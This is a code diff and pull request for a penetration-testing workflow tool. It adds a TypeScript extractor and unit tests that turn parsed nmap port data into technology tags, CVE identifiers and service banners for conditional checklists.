+            { id: "b", output: "patch for cve-2020-1234" },
+          ],
+        }),
+      );
+      const cves = fps.filter(
+        (f) => f.type === "cves" && f.value === "CVE-2020-1234",
+      );
+      expect(cves.length).toBe(1);
+    });
+  });
+
+  describe("banners", () => {
+    it("joins product + version + extrainfo into a single banner", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          product: "Apache httpd",
+          version: "2.4.49",
+          extrainfo: "(Ubuntu)",
+        }),
+      );
+      const banners = fps
+        .filter((f) => f.type === "banners")
+        .map((f) => f.value);
+      expect(banners).toEqual(["Apache httpd 2.4.49 (Ubuntu)"]);
+    });
+
+    it("emits no banner when product/version/extrainfo are all absent", () => {
+      const fps = extractNmapFingerprints(makePort({ service: "http" }));
+      expect(fps.some((f) => f.type === "banners")).toBe(false);
+    });
+
+    it("trims whitespace and skips empty segments", () => {
+      const fps = extractNmapFingerprints(
+        makePort({
+          product: "  Nginx  ",
+          version: "",
+          extrainfo: "1.18.0",
+        }),
+      );
+      const banners = fps
+        .filter((f) => f.type === "banners")
+        .map((f) => f.value);
+      expect(banners).toEqual(["Nginx 1.18.0"]);
+    });
+  });
+
+  it("returns empty array for a port with no signals", () => {
+    expect(extractNmapFingerprints(makePort({ service: "unknown" }))).toEqual(
+      [],
+    );
+  });
+
+  it("ordering is deterministic: tech, then cves, then banners", () => {
+    const fps = extractNmapFingerprints(
+      makePort({
+        product: "Apache httpd",
+        version: "2.4.49",
+        scripts: [{ id: "vulners", output: "CVE-2021-41773" }],
+      }),
+    );
+    const types = fps.map((f) => f.type);
+    expect(types.indexOf("tech")).toBeLessThan(types.indexOf("cves"));
+    expect(types.indexOf("cves")).toBeLessThan(types.indexOf("banners"));
+  });
+});

--- a/src/lib/parser/fingerprints.ts
+++ b/src/lib/parser/fingerprints.ts
@@ -1,0 +1,147 @@
+/**
+ * Nmap fingerprint extractor (v2.4.0 P2 #27).
+ *
+ * Distills tech / CVE / banner signals from a parsed nmap port row into
+ * a flat `Fingerprint[]` shape that the resolver (P4) can evaluate
+ * `autorecon_finding(type, value)` predicates against. Predicates that
+ * read raw nmap data live (`nmap_script_contains`, `nmap_version_matches`)
+ * don't go through this extractor — they query `port_scripts` and the
+ * `ports` columns directly.
+ *
+ * Heuristics are deliberately conservative — false positives here mean
+ * KB conditional groups fire on the wrong port and the operator sees
+ * irrelevant checks. False negatives are recoverable (the operator just
+ * doesn't get the bonus checks). When in doubt, drop the signal.
+ *
+ * Pure functions, no I/O. Persistence is handled by `fingerprints-repo`.
+ */
+
+import type { ParsedPort } from "./types";
+
+export type FingerprintType = "tech" | "cves" | "banners";
+
+export interface NmapFingerprint {
+  type: FingerprintType;
+  value: string;
+}
+
+/**
+ * Tech keywords matched substring-wise against the lower-cased product /
+ * version / extrainfo / script-output blob. Order is intentional —
+ * specific names before generic family terms (e.g. `wordpress` before
+ * `apache`) so the strongest signal wins when both appear in one banner.
+ *
+ * Keep this list narrow. Each entry should map to a distinct attack
+ * surface that KB authors might want to gate a checklist group on.
+ */
+const TECH_KEYWORDS: ReadonlyArray<{ tag: string; needles: string[] }> = [
+  { tag: "wordpress", needles: ["wordpress"] },
+  { tag: "drupal", needles: ["drupal"] },
+  { tag: "joomla", needles: ["joomla"] },
+  { tag: "phpmyadmin", needles: ["phpmyadmin"] },
+  { tag: "tomcat", needles: ["tomcat", "apache-coyote"] },
+  { tag: "jenkins", needles: ["jenkins"] },
+  { tag: "weblogic", needles: ["weblogic"] },
+  { tag: "iis", needles: ["microsoft-iis", "microsoft iis"] },
+  { tag: "nginx", needles: ["nginx"] },
+  { tag: "apache", needles: ["apache httpd", "apache/2.", "apache/1."] },
+  { tag: "lighttpd", needles: ["lighttpd"] },
+  { tag: "openssh", needles: ["openssh"] },
+  { tag: "vsftpd", needles: ["vsftpd"] },
+  { tag: "proftpd", needles: ["proftpd"] },
+  { tag: "samba", needles: ["samba"] },
+  { tag: "mysql", needles: ["mysql"] },
+  { tag: "postgresql", needles: ["postgresql"] },
+  { tag: "mssql", needles: ["microsoft sql server", "ms-sql"] },
+  { tag: "oracle", needles: ["oracle tnslsnr", "oracle database"] },
+  { tag: "redis", needles: ["redis"] },
+  { tag: "mongodb", needles: ["mongodb"] },
+  { tag: "memcached", needles: ["memcached"] },
+  { tag: "elasticsearch", needles: ["elasticsearch"] },
+  { tag: "rabbitmq", needles: ["rabbitmq"] },
+  { tag: "ldap", needles: ["openldap", "active directory ldap"] },
+  { tag: "kerberos", needles: ["kerberos"] },
+  { tag: "smb", needles: ["microsoft-ds", "netbios-ssn"] },
+  { tag: "rdp", needles: ["ms-wbt-server"] },
+  // Languages — usually surface via X-Powered-By or extrainfo.
+  { tag: "php", needles: ["php/", "x-powered-by: php"] },
+  { tag: "asp.net", needles: ["asp.net", "x-powered-by: asp.net"] },
+  { tag: "node.js", needles: ["node.js", "x-powered-by: express"] },
+  { tag: "python", needles: ["werkzeug", "gunicorn", "uvicorn"] },
+  { tag: "ruby", needles: ["puma", "passenger phusion", "thin "] },
+];
+
+const CVE_RE = /CVE-\d{4}-\d{4,7}/gi;
+
+/**
+ * Build the haystack used for tech / CVE matching from a single port row.
+ * Lower-cased so callers can match in lowercase. Includes product, version,
+ * extrainfo, every NSE script output (id + body — `http-php-version`
+ * matters even when the body is short), CPEs, and the service name. The
+ * blob isn't persisted — only used to derive fingerprints.
+ */
+function buildHaystack(port: ParsedPort): string {
+  const parts: string[] = [];
+  if (port.service) parts.push(port.service);
+  if (port.product) parts.push(port.product);
+  if (port.version) parts.push(port.version);
+  if (port.extrainfo) parts.push(port.extrainfo);
+  if (port.cpe) parts.push(...port.cpe);
+  for (const s of port.scripts) {
+    parts.push(s.id);
+    parts.push(s.output);
+  }
+  return parts.join(" ").toLowerCase();
+}
+
+/**
+ * Extract a stable, deduplicated banner string from product / version /
+ * extrainfo. Empty when none are present. The shape mirrors what an
+ * operator would copy out of the nmap "Service Info" line, so KB
+ * authors writing `autorecon_finding(type: banners, value: "Apache/2.4.49")`
+ * can match what they see in the heatmap.
+ */
+function extractBanner(port: ParsedPort): string | null {
+  const segments = [port.product, port.version, port.extrainfo]
+    .map((s) => (typeof s === "string" ? s.trim() : ""))
+    .filter((s) => s.length > 0);
+  return segments.length > 0 ? segments.join(" ") : null;
+}
+
+/**
+ * Heuristic nmap fingerprint extractor.
+ *
+ * Returns a deduplicated `NmapFingerprint[]` covering every signal we
+ * could derive from this port. Order is deterministic (tech first, then
+ * cves, then banners) so test fixtures can lock it down.
+ */
+export function extractNmapFingerprints(port: ParsedPort): NmapFingerprint[] {
+  const out: NmapFingerprint[] = [];
+  const haystack = buildHaystack(port);
+
+  // --- tech ---
+  const seenTech = new Set<string>();
+  for (const { tag, needles } of TECH_KEYWORDS) {
+    if (seenTech.has(tag)) continue;
+    if (needles.some((n) => haystack.includes(n))) {
+      out.push({ type: "tech", value: tag });
+      seenTech.add(tag);
+    }
+  }
+
+  // --- CVEs ---
+  const seenCves = new Set<string>();
+  const cveMatches = haystack.match(CVE_RE) ?? [];
+  for (const raw of cveMatches) {
+    const upper = raw.toUpperCase();
+    if (seenCves.has(upper)) continue;
+    out.push({ type: "cves", value: upper });
+    seenCves.add(upper);
+  }
+
+  // --- banner ---
+  const banner = extractBanner(port);
+  if (banner) out.push({ type: "banners", value: banner });
+
+  return out;
+}


### PR DESCRIPTION
Second phase of #14 (\`v2.4.0\` milestone). Closes #27.

**Depends on but does NOT require** #31 (P1) to be merged first — P2 only references the conditional schema indirectly (\`source: nmap\` gets read by P4's predicate evaluator). Can merge in either order.

## Summary

- **Migration 0021** + Drizzle schema: new \`port_fingerprints\` table with \`UNIQUE(port_id, source, type, value)\` for idempotent rescans and CHECK enums for source / type.
- **Extractor** (\`src/lib/parser/fingerprints.ts\`): pure functions, no I/O. Tech tags from a curated keyword list, CVE regex, and banner concatenation. Deterministic ordering for stable test fixtures.
- **Repo** (\`src/lib/db/fingerprints-repo.ts\`): \`replaceForPort\` (per-source delete + reinsert) + \`listForPort\` (filtered read). \`replaceForPort\` runs inside the caller's transaction so a partial scan never leaves stale rows.
- **Wired into both import paths** — \`createFromScan\` (fresh engagement) and \`applyRescan\` (re-import update + new-port branches). AutoRecon-derived rows survive a fresh nmap rescan.
- **Predicates that read raw nmap data** (\`nmap_script_contains\`, \`nmap_version_matches\`) deliberately don't go through this table — they'll query \`port_scripts\` / \`ports\` columns live in P4. Pre-extraction would require knowing the regex patterns ahead of time.

## Test plan
- [x] \`npm run test\` — 497 pass (was 479; +18 new cases).
- [x] \`npm run typecheck\` clean.
- [x] \`npx eslint 'src/**/*.ts' 'app/**/*.ts*'\` clean.
- [ ] Smoke: import an nmap XML fixture, query \`SELECT * FROM port_fingerprints\`, verify expected tech tags + CVEs surface.
- [ ] Re-import same XML — fingerprint row count stays stable (no duplicates from UNIQUE + ON CONFLICT DO NOTHING).
- [ ] Mixed re-import: nmap rescan after AutoRecon import — autorecon-source rows untouched.

## What's next
- **#28 (P3)**: AutoRecon fingerprint extractor — same shape, sources from whatweb / feroxbuster / nikto.
- **#29 (P4)**: resolver evaluating the \`when\` DSL.
- **#30 (P5)**: UI provenance badges.